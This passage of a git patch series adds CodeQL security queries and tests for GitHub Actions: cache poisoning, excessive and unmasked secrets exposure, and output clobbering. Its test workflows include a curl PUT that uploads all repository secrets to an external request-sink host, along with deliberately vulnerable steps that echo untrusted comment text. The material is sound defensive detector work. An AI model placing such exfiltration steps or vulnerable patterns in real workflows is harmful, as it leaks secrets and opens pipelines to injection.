.github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | +| .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | +| .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | +| .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | +| .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | +| .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | +#select +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref new file mode 100644 index 000000000000..9d1910990fc0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaDirectCache.ql + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected new file mode 100644 index 000000000000..a515bd87334f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected @@ -0,0 +1,49 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | +| .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | +| .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:22:9:23:21 | Run Step | +| .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:18:9:19:21 | Run Step | +| .github/workflows/direct_cache3.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | +| .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:23:9:24:21 | Run Step | +| .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | +| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache3.yml:13:9:14:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | +| .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | +| .github/workflows/poisonable_step1.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | +| .github/workflows/poisonable_step1.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | +| .github/workflows/poisonable_step1.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | +| .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | +| .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | +| .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | +| .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | +| .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | +| .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | +#select +| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref new file mode 100644 index 000000000000..89db21d70f59 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaPoisonableStep.ql + From 9f79e51e89f29b550154143b7583214387ad0bd8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 12:46:28 +0200 Subject: [PATCH 457/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1c4415a305de..31270d399723 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.31 +version: 0.1.32 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 9b49717942b5..99e9fac00a40 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.31 +version: 0.1.32 groups: [actions, queries] suites: codeql-suites extractor: javascript From 6842babd163be86495550d0a29fad704a9484d1f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 23:08:52 +0200 Subject: [PATCH 458/707] feat(query): New queries for incorrect secrets handling ExcessiveSecretsExposure: Reports when all secrets are passed to the workflow runner since that violates the principle of least privelege. UnmaskedSecretExposure: Reports when secrets are derived from a JSON secret since they wont get masked by the workflow runner --- ql/lib/codeql/actions/ast/internal/Ast.qll | 4 +-- .../CWE-312/ExcessiveSecretsExposure.ql | 23 +++++++++++++++++ .../CWE-312/UnmaskedSecretExposure.ql | 19 ++++++++++++++ .../CWE-312/.github/workflows/neg_test1.yml | 19 ++++++++++++++ .../CWE-312/.github/workflows/test1.yml | 25 +++++++++++++++++++ .../CWE-312/ExcessiveSecretsExposure.expected | 3 +++ .../CWE-312/ExcessiveSecretsExposure.qlref | 2 ++ .../CWE-312/UnmaskedSecretExposure.expected | 2 ++ .../CWE-312/UnmaskedSecretExposure.qlref | 2 ++ 9 files changed, 97 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql create mode 100644 ql/src/Security/CWE-312/UnmaskedSecretExposure.ql create mode 100644 ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml create mode 100644 ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected create mode 100644 ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref create mode 100644 ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected create mode 100644 ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5bb94ba8a68c..d9738cb74ad8 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1288,9 +1288,9 @@ string getAToJsonReferenceExpression(string s, int offset) { // not just the last (greedy match) or first (reluctant match). result = s.trim() - .regexpFind("(?i)tojson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + .regexpFind("(?i)tojson\\(\\s*[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", _, offset) - .regexpCapture("(?i)tojson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + .regexpCapture("(?i)tojson\\(\\s*([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", 1) } diff --git a/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql new file mode 100644 index 000000000000..c1d22e3a1811 --- /dev/null +++ b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql @@ -0,0 +1,23 @@ +/** + * @name Excessive Secrets Exposure + * @description All organization and repository secrets are passed to the workflow runner. + * @kind problem + * @problem.severity recommendation + * @id actions/excessive-secrets-exposure + * @tags actions + * security + * external/cwe/cwe-312 + */ + +import actions +import codeql.actions.ast.internal.Ast + +from Expression expr +where + getAToJsonReferenceExpression(expr.getExpression(), _).matches("secrets%") + or + expr.getExpression().matches("secrets[%") and + not expr.getExpression().matches("secrets[\"%") and + not expr.getExpression().matches("secrets['%") +select expr, "All organization and repository secrets are passed to the workflow runner in $@", + expr, expr.getExpression() diff --git a/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql b/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql new file mode 100644 index 000000000000..961af6f267be --- /dev/null +++ b/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql @@ -0,0 +1,19 @@ +/** + * @name Unmasked Secret Exposure + * @description Secrets derived from other secrets are not masked by the workflow runner. + * @kind problem + * @problem.severity error + * @security-severity 9.0 + * @precision high + * @id actions/unmasked-secret-exposure + * @tags actions + * security + * external/cwe/cwe-312 + */ + +import actions + +from Expression expr +where expr.getExpression().regexpMatch("(?i).*fromjson\\(secrets\\..*\\)\\..*") +select expr, "An unmasked secret derived from another secret may be exposed in $@", expr, + expr.getExpression() diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml new file mode 100644 index 000000000000..80f98bd57afc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml @@ -0,0 +1,19 @@ +name: secrets +on: + workflow_dispatch: +jobs: + build: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ secrets.TOKEN }}' > secrets.txt + curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com + - env: + A_SECRET: ${{ secrets.TOKEN }} + run: echo "$A_SECRET" + - env: + A_SECRET: ${{ secrets['TOKEN'] }} + run: echo "$A_SECRET" + - env: + A_SECRET: ${{ secrets["TOKEN"] }} + run: echo "$A_SECRET" diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml new file mode 100644 index 000000000000..614efab34c98 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml @@ -0,0 +1,25 @@ +name: list-actions-secrets +on: + workflow_dispatch: +jobs: + build: + runs-on: ubuntu-latest + strategy: + matrix: + TOKENS: [WRITE, READ] + steps: + - run: | + echo '${{ toJSON(secrets) }}' > secrets.txt + curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com + - env: + ALL_SECRETS: ${{ toJSON(secrets) }} + run: echo "$ALL_SECRETS" + - env: + SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} + run: echo "$SOME_SECRETS" + - env: + username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} + password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} + run: | + echo "$username" + echo "$password" diff --git a/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected new file mode 100644 index 000000000000..9d6a741ed58f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected @@ -0,0 +1,3 @@ +| .github/workflows/test1.yml:12:18:12:39 | toJSON(secrets) | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:12:18:12:39 | toJSON(secrets) | toJSON(secrets) | +| .github/workflows/test1.yml:15:25:15:46 | toJSON(secrets) | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:15:25:15:46 | toJSON(secrets) | toJSON(secrets) | +| .github/workflows/test1.yml:18:26:18:72 | secrets[format('PAT_%s', matrix.TOKENS)] | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:18:26:18:72 | secrets[format('PAT_%s', matrix.TOKENS)] | secrets[format('PAT_%s', matrix.TOKENS)] | diff --git a/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref new file mode 100644 index 000000000000..45f5ad80fd98 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref @@ -0,0 +1,2 @@ +Security/CWE-312/ExcessiveSecretsExposure.ql + diff --git a/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected new file mode 100644 index 000000000000..4f309344b4bc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected @@ -0,0 +1,2 @@ +| .github/workflows/test1.yml:21:22:21:72 | fromJson(secrets.AZURE_CREDENTIALS).clientId | An unmasked secret derived from another secret may be exposed in $@ | .github/workflows/test1.yml:21:22:21:72 | fromJson(secrets.AZURE_CREDENTIALS).clientId | fromJson(secrets.AZURE_CREDENTIALS).clientId | +| .github/workflows/test1.yml:22:22:22:76 | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | An unmasked secret derived from another secret may be exposed in $@ | .github/workflows/test1.yml:22:22:22:76 | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | diff --git a/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref new file mode 100644 index 000000000000..ad4c84615237 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref @@ -0,0 +1,2 @@ +Security/CWE-312/UnmaskedSecretExposure.ql + From c442f1b96b2c975811d0f473b08ecd94dae2d9cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 23:30:47 +0200 Subject: [PATCH 459/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 31270d399723..75b7f0057f74 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.32 +version: 0.1.33 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 99e9fac00a40..4198930865f5 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.32 +version: 0.1.33 groups: [actions, queries] suites: codeql-suites extractor: javascript From 473251371ba2bbffbfeed2add4e750397f6fde9e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 13:17:36 +0200 Subject: [PATCH 460/707] feat(queries): Improve Output Clobbering query Add support for clobbering of `set-output` workflow command --- ql/lib/codeql/actions/Helper.qll | 13 ++-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 4 +- .../security/OutputClobberingQuery.qll | 63 +++++++++++++++++++ .../Security/CWE-077/OutputClobberingHigh.ql | 1 + .../CWE-077/.github/workflows/output2.yml | 56 +++++++++++++++++ .../CWE-077/OutputClobberingHigh.expected | 18 ++++++ 6 files changed, 147 insertions(+), 8 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/output2.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 2953817de6b8..1d88f6f65118 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -20,7 +20,7 @@ string wrapJsonRegexp(string regex) { } bindingset[str] -private string trimQuotes(string str) { +string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } @@ -279,6 +279,10 @@ predicate inNonPrivilegedContext(AstNode node) { inNonPrivilegedJob(node) } +string partialFileContentRegexp() { + result = ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] +} + bindingset[snippet] predicate outputsPartialFileContent(string snippet) { // e.g. @@ -286,12 +290,7 @@ predicate outputsPartialFileContent(string snippet) { // echo "FOO=$(> $GITHUB_ENV // yq '.foo' foo.yml >> $GITHUB_PATH // cat foo.txt >> $GITHUB_PATH - snippet - .regexpMatch([ - "(\\$\\(|`)<.*", - ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + - ".*" - ]) + snippet.regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + partialFileContentRegexp() + ".*"]) } string defaultBranchNames() { diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 5d0d45c26c15..aa31954ad3c5 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -8,6 +8,7 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.OutputClobberingQuery private import codeql.actions.security.UntrustedCheckoutQuery /** @@ -114,7 +115,8 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { succ.asExpr() = run.getScriptScalar() and ( envToSpecialFile(["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], var_name, run, _) or - envToArgInjSink(var_name, run, _) + envToArgInjSink(var_name, run, _) or + exists(OutputClobberingSink n | n.asExpr() = run.getScriptScalar()) ) ) } diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index af8f7af089db..5a85c22bb8fa 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -92,6 +92,69 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { } } +/** + * - id: clob1 + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * # VULNERABLE + * echo $BODY + * echo "::set-output name=OUTPUT::SAFE" + * - id: clob2 + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * # VULNERABLE + * echo "::set-output name=OUTPUT::SAFE" + * echo $BODY + */ +class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { + WorkflowCommandClobberingFromEnvVarSink() { + exists(Run run, string output_line, string clobbering_line, string var_name | + run.getScript().splitAt("\n") = output_line and + singleLineWorkflowCmd(output_line, "set-output", _, _) and + run.getScript().splitAt("\n") = clobbering_line and + clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() + ) + } +} + +class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { + WorkflowCommandClobberingFromFileReadSink() { + exists(Run run, string output_line, string clobbering_line | + run.getScriptScalar() = this.asExpr() and + run.getScript().splitAt("\n") = output_line and + singleLineWorkflowCmd(output_line, "set-output", _, _) and + run.getScript().splitAt("\n") = clobbering_line and + ( + // A file is read and its content is assigned to an env var that gets printed to stdout + // - run: | + // foo=$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | | +| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | semmle.label | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho 